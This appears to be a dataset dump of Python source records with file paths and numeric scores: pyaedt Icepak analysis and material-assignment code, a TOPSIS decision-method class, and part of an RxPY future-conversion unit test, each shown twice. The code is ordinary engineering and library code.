if no_pec and val.material_name == "pec":
include_object = False
if include_object:
selection_list.append(body)
design.modeler.oeditor.Copy(["NAME:Selections", "Selections:=", ",".join(selection_list)])
self.modeler.oeditor.Paste()
return True
@aedt_exception_handler
def assign_material(self, obj, mat):
"""Assign a material to one or more objects.
Parameters
----------
obj : str, list
One or more objects to assign materials to.
mat : str
Material to assign. If this material is not present it will be
created.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.AssignMaterial
"""
mat = mat.lower()
selections = self.modeler.convert_to_selections(obj, True)
mat_exists = False
if mat in self.materials.material_keys:
mat_exists = True
if mat_exists or self.materials.checkifmaterialexists(mat):
Mat = self.materials.material_keys[mat]
if mat_exists:
Mat.update()
self.logger.info("Assign Material " + mat + " to object " + str(selections))
for el in selections:
self.modeler.primitives[el].material_name = mat
self.modeler.primitives[el].color = self.materials.material_keys[mat].material_appearance
if Mat.is_dielectric():
self.modeler.primitives[el].solve_inside = True
else:
self.modeler.primitives[el].solve_inside = False
return True
else:
self.logger.error("Material does not exist.")
return False
@aedt_exception_handler
def assign_surface_material(self, obj, mat):
"""Assign a surface material to one or more objects.
Parameters
----------
obj : str, list
One or more objects to assign surface materials to.
mat : str
Material to assign. The material must be present in the database.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.ChangeProperty
"""
mat = mat.lower()
if mat not in self.materials.surface_material_keys:
self.logger.warning("Warning. The material is not the database. Use add_surface_material.")
return False
else:
for el in obj:
self.modeler.oeditor.ChangeProperty(
[
"NAME:AllTabs",
[
"NAME:Geometry3DAttributeTab",
["NAME:PropServers", el],
["NAME:ChangedProps", ["NAME:Surface Material", "Value:=", '"' + mat + '"']],
],
]
)
return True
@aedt_exception_handler
def _assign_property_to_mat(self, newmat, val, property):
"""Assign a property to a new material.
Parameters
----------
newmat : str
Name of the new material.
val :
Property value to assign.
property :
Name of the property.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
try:
if "@" not in val:
value = float(val)
newmat.set_property_value(property, value)
else:
value_splitted = val.split(",")
value_list = [
[
float(re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", a)[0])
for a in d.split("@")
]
for d in value_splitted
]
val0 = float(value_list[0][0])
for el in value_list:
el.reverse()
el[1] = float(el[1]) / val0
newmat.set_property_value(property, val0)
dataset = newmat.create_thermal_modifier(value_list)
newmat.set_property_therm_modifier(property, dataset)
return True
except:
return False
@aedt_exception_handler
def _create_dataset_from_sherlock(self, material_name, material_string, property_name="Mass_Density"):
mats = material_string.split(",")
mat_temp = [[i.split("@")[0], i.split("@")[1]] for i in mats]
nominal_id = int(len(mat_temp) / 2)
nominal_val = float(mat_temp[nominal_id - 1][0])
ds_name = generate_unique_name(property_name)
self.create_dataset(
ds_name,
[float(i[1].replace("C", "").replace("K", "").replace("F", "")) for i in mat_temp],
[float(i[0]) / nominal_val for i in mat_temp],
)
return nominal_val, "$" + ds_name
@aedt_exception_handler
def assignmaterial_from_sherlock_files(self, csv_component, csv_material):
"""Assign material to objects in a design based on a CSV file obtained from Sherlock.
Parameters
----------
csv_component : str
Name of the CSV file containing the component properties, including the
material name.
csv_material : str
Name of the CSV file containing the material properties.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.AssignMaterial
"""
with open(csv_material) as csvfile:
csv_input = csv.reader(csvfile)
material_header = next(csv_input)
data = list(csv_input)
k = 0
material_data = {}
for el in material_header:
material_data[el] = [i[k] for i in data]
k += 1
with open(csv_component) as csvfile:
csv_input = csv.reader(csvfile)
component_header = next(csv_input)
data = list(csv_input)
k = 0
component_data = {}
for el in component_header:
component_data[el] = [i[k] for i in data]
k += 1
all_objs = self.modeler.primitives.object_names
i = 0
for mat in material_data["Name"]:
list_mat_obj = [
"COMP_" + rd for rd, md in zip(component_data["Ref Des"], component_data["Material"]) if md == mat
]
list_mat_obj += [rd for rd, md in zip(component_data["Ref Des"], component_data["Material"]) if md == mat]
list_mat_obj = [mo for mo in list_mat_obj if mo in all_objs]
if list_mat_obj:
if not self.materials.checkifmaterialexists(mat.lower()):
newmat = self.materials.add_material(mat.lower())
else:
newmat = self.materials[mat.lower()]
if "Material Density" in material_data:
if "@" in material_data["Material Density"][i] and "," in material_data["Material Density"][i]:
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Material Density"][i], "Mass_Density"
)
newmat.mass_density = nominal_val
newmat.mass_density.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Material Density"][i]
newmat.mass_density = value
if "Thermal Conductivity" in material_data:
if (
"@" in material_data["Thermal Conductivity"][i]
and "," in material_data["Thermal Conductivity"][i]
):
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Thermal Conductivity"][i], "Thermal_Conductivity"
)
newmat.thermal_conductivity = nominal_val
newmat.thermal_conductivity.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Thermal Conductivity"][i]
newmat.thermal_conductivity = value
if "Material CTE" in material_data:
if "@" in material_data["Material CTE"][i] and "," in material_data["Material CTE"][i]:
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Material CTE"][i], "CTE"
)
newmat.thermal_expansion_coefficient = nominal_val
newmat.thermal_expansion_coefficient.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Material CTE"][i]
newmat.thermal_expansion_coefficient = value
if "Poisson Ratio" in material_data:
if "@" in material_data["Poisson Ratio"][i] and "," in material_data["Poisson Ratio"][i]:
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Poisson Ratio"][i], "Poisson_Ratio"
)
newmat.poissons_ratio = nominal_val
newmat.poissons_ratio.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Poisson Ratio"][i]
newmat.poissons_ratio = value
if "Elastic Modulus" in material_data:
if "@" in material_data["Elastic Modulus"][i] and "," in material_data["Elastic Modulus"][i]:
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Elastic Modulus"][i], "Youngs_Modulus"
)
newmat.youngs_modulus = nominal_val
newmat.youngs_modulus.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Elastic Modulus"][i]
newmat.youngs_modulus = value
self.assign_material(list_mat_obj, mat)
for obj_name in list_mat_obj:
if not self.modeler.primitives[obj_name].surface_material_name:
self.modeler.primitives[obj_name].surface_material_name = "Steel-oxidised-surface"
i += 1
all_objs = [ao for ao in all_objs if ao not in list_mat_obj]
return True
@aedt_exception_handler
def get_all_conductors_names(self):
"""Retrieve all conductors in the active design.
Returns
-------
list of str
List of conductors.
"""
cond = [i.lower() for i in list(self.materials.conductors)]
obj_names = []
for el, obj in self.modeler.primitives.objects.items():
if obj.material_name in cond:
obj_names.append(obj.name)
return obj_names
@aedt_exception_handler
def get_all_dielectrics_names(self):
"""Retrieve all dielectrics in the active design.
Returns
-------
list of str
List of dielectrics.
"""
diel = [i.lower() for i in list(self.materials.dielectrics)]
obj_names = []
for el, obj in self.modeler.primitives.objects.items():
if obj.material_name in diel:
obj_names.append(obj.name)
return obj_names | pyaedt/application/AnalysisIcepak.py | import csv
import re
import os
from pyaedt.generic.general_methods import aedt_exception_handler, generate_unique_name, is_ironpython
from pyaedt.application.Analysis import Analysis
from pyaedt.modeler.Model3D import Modeler3D
from pyaedt.modules.MeshIcepak import IcepakMesh
if is_ironpython:
from pyaedt.modules.PostProcessor import PostProcessor
else:
from pyaedt.modules.AdvancedPostProcessing import PostProcessor
class FieldAnalysisIcepak(Analysis, object):
"""Manages 3D field analysis setup in Icepak.
This class is automatically initialized by an appliation call from
HFSS, Icepak, Q3D, or Maxwell 3D. See the application function
for parameter definitions.
Parameters
----------
application : str
Application that is to initialize the call.
projectname : str, optional
Name of the project to select or the full path to the project
or AEDTZ archive to open. The default is ``None``, in which
case an attempt is made to get an active project. If no
projects are present, an empty project is created.
designname : str, optional
Name of the design to select. The default is ``None``, in
which case an attempt is made to get an active design. If no
designs are present, an empty design is created.
solutiontype : str, optional
Solution type to apply to the design. The default is
``None``, in which case the default type is applied.
setup_name : str, optional
Name of the setup to use as the nominal. The default is
``None``, in which case the active setup is used or
nothing is used.
specified_version : str, optional
Version of AEDT to use. The default is ``None``, in which case
the active version or latest installed version is used.
NG : bool, optional
Whether to run AEDT in the non-graphical mode. The default
is ``False``, in which case AEDT launches in the graphical mode.
new_desktop_session : bool, optional
Whether to launch an instance of AEDT in a new thread, even if
another instance of the ``specified_version`` is active on the
machine. The default is ``True``.
close_on_exit : bool, optional
Whether to release AEDT on exit. The default is ``False``.
student_version : bool, optional
Whether to enable the student version of AEDT. The default
is ``False``.
"""
def __init__(
self,
application,
projectname,
designname,
solutiontype,
setup_name=None,
specified_version=None,
non_graphical=False,
new_desktop_session=False,
close_on_exit=False,
student_version=False,
):
Analysis.__init__(
self,
application,
projectname,
designname,
solutiontype,
setup_name,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
)
self._osolution = self._odesign.GetModule("Solutions")
self._oboundary = self._odesign.GetModule("BoundarySetup")
self._modeler = Modeler3D(self)
self._mesh = IcepakMesh(self)
self._post = PostProcessor(self)
@property
def osolution(self):
"""Solution Module.
References
----------
>>> oModule = oDesign.GetModule("Solutions")
"""
return self._osolution
@property
def oboundary(self):
"""Boundary Module.
References
----------
>>> oModule = oDesign.GetModule("BoundarySetup")
"""
return self._oboundary
@property
def modeler(self):
"""Modeler.
Returns
-------
:class:`pyaedt.modeler.Model3D.Modeler3D`
"""
return self._modeler
@property
def mesh(self):
"""Mesh.
Returns
-------
:class:`pyaedt.modules.MeshIcepak.IcepakMesh`
"""
return self._mesh
@aedt_exception_handler
def plot(
self,
objects=None,
show=True,
export_path=None,
plot_as_separate_objects=True,
plot_air_objects=True,
force_opacity_value=None,
clean_files=False,
):
"""Plot the model or a substet of objects.
Parameters
----------
objects : list, optional
Optional list of objects to plot. If `None` all objects will be exported.
show : bool, optional
Show the plot after generation or simply return the
generated Class for more customization before plot.
export_path : str, optional
If available, an image is saved to file. If `None` no image will be saved.
plot_as_separate_objects : bool, optional
Plot each object separately. It may require more time to export from AEDT.
plot_air_objects : bool, optional
Plot also air and vacuum objects.
force_opacity_value : float, optional
Opacity value between 0 and 1 to be applied to all model.
If `None` aedt opacity will be applied to each object.
clean_files : bool, optional
Clean created files after plot. Cache is mainteined into the model object returned.
Returns
-------
:class:`pyaedt.generic.plot.ModelPlotter`
Model Object.
"""
if is_ironpython:
self.logger.warning("Plot is available only on CPython")
elif self._aedt_version < "2021.2":
self.logger.warning("Plot is supported from AEDT 2021 R2.")
else:
return self.post.plot_model_obj(
objects=objects,
show=show,
export_path=export_path,
plot_as_separate_objects=plot_as_separate_objects,
plot_air_objects=plot_air_objects,
force_opacity_value=force_opacity_value,
clean_files=clean_files,
)
@aedt_exception_handler
def apply_icepak_settings(
self,
ambienttemp=20,
gravityDir=5,
perform_minimal_val=True,
default_fluid="air",
default_solid="Al-Extruded",
default_surface="Steel-oxidised-surface",
):
"""Apply Icepak default design settings.
Parameters
----------
ambienttemp : float, optional
Ambient temperature, which can be an integer or a parameter already
created in AEDT. The default is ``20``.
gravityDir : int, optional
Gravity direction index in the range ``[0, 5]``. The default is ``5``.
perform_minimal_val : bool, optional
Whether to perform minimal validation. The default is ``True``.
If ``False``, full validation is performend.
default_fluid : str, optional
Default for the type of fluid. The default is ``"Air"``.
default_solid :
Default for the type of solid. The default is ``"Al-Extruded"``.
default_surface :
Default for the type of surface. The default is ``"Steel-oxidised-surface"``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oDesign.SetDesignSettings
"""
try:
AmbientTemp = str(float(ambienttemp)) + "cel"
except:
AmbientTemp = ambienttemp
IceGravity = ["X", "Y", "Z"]
GVPos = False
if int(gravityDir) > 2:
GVPos = True
GVA = IceGravity[int(gravityDir) - 3]
self.odesign.SetDesignSettings(
[
"NAME:Design Settings Data",
"Perform Minimal validation:=",
perform_minimal_val,
"Default Fluid Material:=",
default_fluid,
"Default Solid Material:=",
default_solid,
"Default Surface Material:=",
default_surface,
"AmbientTemperature:=",
AmbientTemp,
"AmbientPressure:=",
"0n_per_meter_sq",
"AmbientRadiationTemperature:=",
AmbientTemp,
"Gravity Vector CS ID:=",
1,
"Gravity Vector Axis:=",
GVA,
"Positive:=",
GVPos,
],
["NAME:Model Validation Settings"],
)
return True
@aedt_exception_handler
def export_3d_model(self, fileName, filePath, fileFormat=".step", object_list=[], removed_objects=[]):
"""Export the 3D model.
Parameters
----------
fileName : str
Name of the file.
filePath : str
Path for the file.
fileFormat : str, optional
Format of the file. The default is ``".step"``.
object_list : list, optional
List of objects to export. The default is ``[]``.
removed_objects : list, optional
The default is ``[]``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.Export
"""
if not object_list:
allObjects = self.modeler.primitives.object_names
if removed_objects:
for rem in removed_objects:
allObjects.remove(rem)
else:
if "Region" in allObjects:
allObjects.remove("Region")
else:
allObjects = object_list[:]
self.logger.info("Exporting {} objects".format(len(allObjects)))
major = -1
minor = -1
# actual version supported by AEDT is 29.0
if fileFormat in [".step", ".stp", ".sm3", ".sat", ".sab"]:
major = 29
minor = 0
stringa = ",".join(allObjects)
arg = [
"NAME:ExportParameters",
"AllowRegionDependentPartSelectionForPMLCreation:=",
True,
"AllowRegionSelectionForPMLCreation:=",
True,
"Selections:=",
stringa,
"File Name:=",
os.path.join(filePath, fileName + fileFormat),
"Major Version:=",
major,
"Minor Version:=",
minor,
]
self.modeler.oeditor.Export(arg)
return True
@aedt_exception_handler
def get_property_value(self, objectname, property, type=None):
"""Retrieve a design property value for an object.
Parameters
----------
objectname : str
Name of the object.
property : str
Name of the design property.
type : string, optional
Type of the property. Options are ``"boundary"``,
``"excitation"``, ``"setup"``, and ``"mesh"``. The default
is ``None``.
Returns
-------
type
Value of the property.
References
----------
>>> oDesign.GetPropertyValue
Examples
--------
>>> val = ipk.get_property_value('BoundarySetup:Source1', 'Total Power')
"""
boundary = {"HFSS": "HfssTab", "Icepak": "Icepak", "Q3D": "Q3D", "Maxwell3D": "Maxwell3D"}
excitation = {"HFSS": "HfssTab", "Icepak": "Icepak", "Q3D": "Q3D", "Maxwell3D": "Maxwell3D"}
setup = {"HFSS": "HfssTab", "Icepak": "Icepak", "Q3D": "General", "Maxwell3D": "General"}
mesh = {"HFSS": "MeshSetupTab", "Icepak": "Icepak", "Q3D": "Q3D", "Maxwell3D": "Maxwell3D"}
all = {
"HFSS": ["HfssTab", "MeshSetupTab"],
"Icepak": ["Icepak"],
"Q3D": ["Q3D", "General"],
"Maxwell3D": ["Maxwell3D", "General"],
}
if type == "Boundary":
propserv = boundary[self._design_type]
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
elif type == "Setup":
propserv = setup[self._design_type]
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
elif type == "Excitation":
propserv = excitation[self._design_type]
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
elif type == "Mesh":
propserv = mesh[self._design_type]
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
else:
propservs = all[self._design_type]
for propserv in propservs:
properties = list(self.odesign.GetProperties(propserv, objectname))
if property in properties:
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
return None
@aedt_exception_handler
def copy_solid_bodies_from(self, design, object_list=None, no_vacuum=True, no_pec=True):
"""Copy a list of objects from one design to the active design.
Parameters
----------
design : str
Starting application object. For example, ``'hfss1=HFSS3DLayout'``.
object_list : list, optional
List of objects to copy. The default is ``None``.
no_vacuum : bool, optional
Whether to include vacuum objects for the copied objects.
The default is ``True``.
no_pec :
Whether to include pec objects for the copied objects. The
default is ``True``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.Copy
>>> oEditor.Paste
"""
body_list = design.modeler.solid_bodies
selection_list = []
material_properties = design.modeler.primitives.objects
for body in body_list:
include_object = True
if object_list:
if body not in object_list:
include_object = False
for key, val in material_properties.items():
if val.name == body:
if no_vacuum and val.material_name == "Vacuum":
include_object = False
if no_pec and val.material_name == "pec":
include_object = False
if include_object:
selection_list.append(body)
design.modeler.oeditor.Copy(["NAME:Selections", "Selections:=", ",".join(selection_list)])
self.modeler.oeditor.Paste()
return True
@aedt_exception_handler
def assign_material(self, obj, mat):
"""Assign a material to one or more objects.
Parameters
----------
obj : str, list
One or more objects to assign materials to.
mat : str
Material to assign. If this material is not present it will be
created.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.AssignMaterial
"""
mat = mat.lower()
selections = self.modeler.convert_to_selections(obj, True)
mat_exists = False
if mat in self.materials.material_keys:
mat_exists = True
if mat_exists or self.materials.checkifmaterialexists(mat):
Mat = self.materials.material_keys[mat]
if mat_exists:
Mat.update()
self.logger.info("Assign Material " + mat + " to object " + str(selections))
for el in selections:
self.modeler.primitives[el].material_name = mat
self.modeler.primitives[el].color = self.materials.material_keys[mat].material_appearance
if Mat.is_dielectric():
self.modeler.primitives[el].solve_inside = True
else:
self.modeler.primitives[el].solve_inside = False
return True
else:
self.logger.error("Material does not exist.")
return False
@aedt_exception_handler
def assign_surface_material(self, obj, mat):
"""Assign a surface material to one or more objects.
Parameters
----------
obj : str, list
One or more objects to assign surface materials to.
mat : str
Material to assign. The material must be present in the database.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.ChangeProperty
"""
mat = mat.lower()
if mat not in self.materials.surface_material_keys:
self.logger.warning("Warning. The material is not the database. Use add_surface_material.")
return False
else:
for el in obj:
self.modeler.oeditor.ChangeProperty(
[
"NAME:AllTabs",
[
"NAME:Geometry3DAttributeTab",
["NAME:PropServers", el],
["NAME:ChangedProps", ["NAME:Surface Material", "Value:=", '"' + mat + '"']],
],
]
)
return True
@aedt_exception_handler
def _assign_property_to_mat(self, newmat, val, property):
"""Assign a property to a new material.
Parameters
----------
newmat : str
Name of the new material.
val :
Property value to assign.
property :
Name of the property.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
try:
if "@" not in val:
value = float(val)
newmat.set_property_value(property, value)
else:
value_splitted = val.split(",")
value_list = [
[
float(re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", a)[0])
for a in d.split("@")
]
for d in value_splitted
]
val0 = float(value_list[0][0])
for el in value_list:
el.reverse()
el[1] = float(el[1]) / val0
newmat.set_property_value(property, val0)
dataset = newmat.create_thermal_modifier(value_list)
newmat.set_property_therm_modifier(property, dataset)
return True
except:
return False
@aedt_exception_handler
def _create_dataset_from_sherlock(self, material_name, material_string, property_name="Mass_Density"):
mats = material_string.split(",")
mat_temp = [[i.split("@")[0], i.split("@")[1]] for i in mats]
nominal_id = int(len(mat_temp) / 2)
nominal_val = float(mat_temp[nominal_id - 1][0])
ds_name = generate_unique_name(property_name)
self.create_dataset(
ds_name,
[float(i[1].replace("C", "").replace("K", "").replace("F", "")) for i in mat_temp],
[float(i[0]) / nominal_val for i in mat_temp],
)
return nominal_val, "$" + ds_name
@aedt_exception_handler
def assignmaterial_from_sherlock_files(self, csv_component, csv_material):
"""Assign material to objects in a design based on a CSV file obtained from Sherlock.
Parameters
----------
csv_component : str
Name of the CSV file containing the component properties, including the
material name.
csv_material : str
Name of the CSV file containing the material properties.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.AssignMaterial
"""
with open(csv_material) as csvfile:
csv_input = csv.reader(csvfile)
material_header = next(csv_input)
data = list(csv_input)
k = 0
material_data = {}
for el in material_header:
material_data[el] = [i[k] for i in data]
k += 1
with open(csv_component) as csvfile:
csv_input = csv.reader(csvfile)
component_header = next(csv_input)
data = list(csv_input)
k = 0
component_data = {}
for el in component_header:
component_data[el] = [i[k] for i in data]
k += 1
all_objs = self.modeler.primitives.object_names
i = 0
for mat in material_data["Name"]:
list_mat_obj = [
"COMP_" + rd for rd, md in zip(component_data["Ref Des"], component_data["Material"]) if md == mat
]
list_mat_obj += [rd for rd, md in zip(component_data["Ref Des"], component_data["Material"]) if md == mat]
list_mat_obj = [mo for mo in list_mat_obj if mo in all_objs]
if list_mat_obj:
if not self.materials.checkifmaterialexists(mat.lower()):
newmat = self.materials.add_material(mat.lower())
else:
newmat = self.materials[mat.lower()]
if "Material Density" in material_data:
if "@" in material_data["Material Density"][i] and "," in material_data["Material Density"][i]:
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Material Density"][i], "Mass_Density"
)
newmat.mass_density = nominal_val
newmat.mass_density.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Material Density"][i]
newmat.mass_density = value
if "Thermal Conductivity" in material_data:
if (
"@" in material_data["Thermal Conductivity"][i]
and "," in material_data["Thermal Conductivity"][i]
):
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Thermal Conductivity"][i], "Thermal_Conductivity"
)
newmat.thermal_conductivity = nominal_val
newmat.thermal_conductivity.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Thermal Conductivity"][i]
newmat.thermal_conductivity = value
if "Material CTE" in material_data:
if "@" in material_data["Material CTE"][i] and "," in material_data["Material CTE"][i]:
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Material CTE"][i], "CTE"
)
newmat.thermal_expansion_coefficient = nominal_val
newmat.thermal_expansion_coefficient.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Material CTE"][i]
newmat.thermal_expansion_coefficient = value
if "Poisson Ratio" in material_data:
if "@" in material_data["Poisson Ratio"][i] and "," in material_data["Poisson Ratio"][i]:
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Poisson Ratio"][i], "Poisson_Ratio"
)
newmat.poissons_ratio = nominal_val
newmat.poissons_ratio.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Poisson Ratio"][i]
newmat.poissons_ratio = value
if "Elastic Modulus" in material_data:
if "@" in material_data["Elastic Modulus"][i] and "," in material_data["Elastic Modulus"][i]:
nominal_val, dataset_name = self._create_dataset_from_sherlock(
mat, material_data["Elastic Modulus"][i], "Youngs_Modulus"
)
newmat.youngs_modulus = nominal_val
newmat.youngs_modulus.thermalmodifier = "pwl({}, Temp)".format(dataset_name)
else:
value = material_data["Elastic Modulus"][i]
newmat.youngs_modulus = value
self.assign_material(list_mat_obj, mat)
for obj_name in list_mat_obj:
if not self.modeler.primitives[obj_name].surface_material_name:
self.modeler.primitives[obj_name].surface_material_name = "Steel-oxidised-surface"
i += 1
all_objs = [ao for ao in all_objs if ao not in list_mat_obj]
return True
@aedt_exception_handler
def get_all_conductors_names(self):
"""Retrieve all conductors in the active design.
Returns
-------
list of str
List of conductors.
"""
cond = [i.lower() for i in list(self.materials.conductors)]
obj_names = []
for el, obj in self.modeler.primitives.objects.items():
if obj.material_name in cond:
obj_names.append(obj.name)
return obj_names
@aedt_exception_handler
def get_all_dielectrics_names(self):
"""Retrieve all dielectrics in the active design.
Returns
-------
list of str
List of dielectrics.
"""
diel = [i.lower() for i in list(self.materials.dielectrics)]
obj_names = []
for el, obj in self.modeler.primitives.objects.items():
if obj.material_name in diel:
obj_names.append(obj.name)
return obj_names | 0.809276 | 0.354391 |
import numpy as np
from ..normalizations import minmax_normalization
from ..distance_metrics import euclidean
from .mcda_method import MCDA_method
class TOPSIS(MCDA_method):
def __init__(self, normalization_method = minmax_normalization, distance_metric = euclidean):
"""
Create the TOPSIS method object and select normalization method `normalization_method` and
distance metric `distance metric`.
Parameters
-----------
normalization_method : function
method for decision matrix normalization chosen from `normalizations`
distance_metric : functions
method for calculating the distance between two vectors
"""
self.normalization_method = normalization_method
self.distance_metric = distance_metric
def __call__(self, matrix, weights, types):
"""
Score alternatives provided in decision matrix `matrix` with m alternatives in rows and
n criteria in columns using criteria `weights` and criteria `types`.
Parameters
----------
matrix : ndarray
Decision matrix with m alternatives in rows and n criteria in columns.
weights: ndarray
Vector with criteria weights. Sum of weights must be equal to 1.
types: ndarray
Vector with criteria types. Profit criteria are represented by 1 and cost by -1.
Returns
-------
ndrarray
Vector with preference values of each alternative. The best alternative has the highest preference value.
Examples
---------
>>> topsis = TOPSIS(normalization_method = minmax_normalization, distance_metric = euclidean)
>>> pref = topsis(matrix, weights, types)
>>> rank = rank_preferences(pref, reverse = True)
"""
TOPSIS._verify_input_data(matrix, weights, types)
return TOPSIS._topsis(matrix, weights, types, self.normalization_method, self.distance_metric)
@staticmethod
def _topsis(matrix, weights, types, normalization_method, distance_metric):
# Normalize matrix using chosen normalization (for example linear normalization)
norm_matrix = normalization_method(matrix, types)
# Multiply all rows of normalized matrix by weights
weighted_matrix = norm_matrix * weights
# Calculate vectors of PIS (ideal solution) and NIS (anti-ideal solution)
pis = np.max(weighted_matrix, axis=0)
nis = np.min(weighted_matrix, axis=0)
# Calculate chosen distance of every alternative from PIS and NIS using chosen distance metric `distance_metric` from `distance_metrics`
Dp = np.array([distance_metric(x, pis) for x in weighted_matrix])
Dm = np.array([distance_metric(x, nis) for x in weighted_matrix])
C = Dm / (Dm + Dp)
return C | src/pyrepo_mcda/mcda_methods/topsis.py | import numpy as np
from ..normalizations import minmax_normalization
from ..distance_metrics import euclidean
from .mcda_method import MCDA_method
class TOPSIS(MCDA_method):
def __init__(self, normalization_method = minmax_normalization, distance_metric = euclidean):
"""
Create the TOPSIS method object and select normalization method `normalization_method` and
distance metric `distance metric`.
Parameters
-----------
normalization_method : function
method for decision matrix normalization chosen from `normalizations`
distance_metric : functions
method for calculating the distance between two vectors
"""
self.normalization_method = normalization_method
self.distance_metric = distance_metric
def __call__(self, matrix, weights, types):
"""
Score alternatives provided in decision matrix `matrix` with m alternatives in rows and
n criteria in columns using criteria `weights` and criteria `types`.
Parameters
----------
matrix : ndarray
Decision matrix with m alternatives in rows and n criteria in columns.
weights: ndarray
Vector with criteria weights. Sum of weights must be equal to 1.
types: ndarray
Vector with criteria types. Profit criteria are represented by 1 and cost by -1.
Returns
-------
ndrarray
Vector with preference values of each alternative. The best alternative has the highest preference value.
Examples
---------
>>> topsis = TOPSIS(normalization_method = minmax_normalization, distance_metric = euclidean)
>>> pref = topsis(matrix, weights, types)
>>> rank = rank_preferences(pref, reverse = True)
"""
TOPSIS._verify_input_data(matrix, weights, types)
return TOPSIS._topsis(matrix, weights, types, self.normalization_method, self.distance_metric)
@staticmethod
def _topsis(matrix, weights, types, normalization_method, distance_metric):
# Normalize matrix using chosen normalization (for example linear normalization)
norm_matrix = normalization_method(matrix, types)
# Multiply all rows of normalized matrix by weights
weighted_matrix = norm_matrix * weights
# Calculate vectors of PIS (ideal solution) and NIS (anti-ideal solution)
pis = np.max(weighted_matrix, axis=0)
nis = np.min(weighted_matrix, axis=0)
# Calculate chosen distance of every alternative from PIS and NIS using chosen distance metric `distance_metric` from `distance_metrics`
Dp = np.array([distance_metric(x, pis) for x in weighted_matrix])
Dm = np.array([distance_metric(x, nis) for x in weighted_matrix])
C = Dm / (Dm + Dp)
return C | 0.93485 | 0.695907 |
import unittest
from nose import SkipTest
import rx
asyncio = rx.config['asyncio']
if asyncio is None:
raise SkipTest("asyncio not available")
Future = rx.config['Future']
from rx import Observable
class TestFromFuture(unittest.TestCase):
def test_future_success(self):
loop = asyncio.get_event_loop()
success = [False, True, False]
@asyncio.coroutine
def go():
future = Future()
future.set_result(42)
source = Observable.from_future(future)
def on_next(x):
success[0] = 42 == x
def on_error(err):
success[1] = False
def on_completed():
success[2] = True
subscription = source.subscribe(on_next, on_error, on_completed)
loop.run_until_complete(go())
assert(all(success))
def test_future_failure(self):
loop = asyncio.get_event_loop()
success = [True, False, True]
@asyncio.coroutine
def go():
error = Exception('woops')
future = Future()
future.set_exception(error)
source = Observable.from_future(future)
def on_next(x):
success[0] = False
def on_error(err):
success[1] = str(err) == str(error)
def on_completed():
success[2] = False
subscription = source.subscribe(on_next, on_error, on_completed)
loop.run_until_complete(go())
assert(all(success))
def test_future_dispose(self):
loop = asyncio.get_event_loop()
success = [True, True, True]
@asyncio.coroutine
def go():
future = Future()
future.set_result(42)
source = Observable.from_future(future)
def on_next(x):
success[0] = False
def on_error(err):
success[1] = False
def on_completed():
success[2] = False
subscription = source.subscribe(on_next, on_error, on_completed)
subscription.dispose()
loop.run_until_complete(go())
assert(all(success)) | tests/test_observable/py3_fromfuture.py | import unittest
from nose import SkipTest
import rx
asyncio = rx.config['asyncio']
if asyncio is None:
raise SkipTest("asyncio not available")
Future = rx.config['Future']
from rx import Observable
class TestFromFuture(unittest.TestCase):
def test_future_success(self):
loop = asyncio.get_event_loop()
success = [False, True, False]
@asyncio.coroutine
def go():
future = Future()
future.set_result(42)
source = Observable.from_future(future)
def on_next(x):
success[0] = 42 == x
def on_error(err):
success[1] = False
def on_completed():
success[2] = True
subscription = source.subscribe(on_next, on_error, on_completed)
loop.run_until_complete(go())
assert(all(success))
def test_future_failure(self):
loop = asyncio.get_event_loop()
success = [True, False, True]
@asyncio.coroutine
def go():
error = Exception('woops')
future = Future()
future.set_exception(error)
source = Observable.from_future(future)
def on_next(x):
success[0] = False
def on_error(err):
success[1] = str(err) == str(error)
def on_completed():
success[2] = False
subscription = source.subscribe(on_next, on_error, on_completed)
loop.run_until_complete(go())
assert(all(success))
def test_future_dispose(self):
loop = asyncio.get_event_loop()
success = [True, True, True]
@asyncio.coroutine
def go():
future = Future()
future.set_result(42)
source = Observable.from_future(future)
def on_next(x):
success[0] = False
def on_error(err):
success[1] = False
def on_completed():
success[2] = False
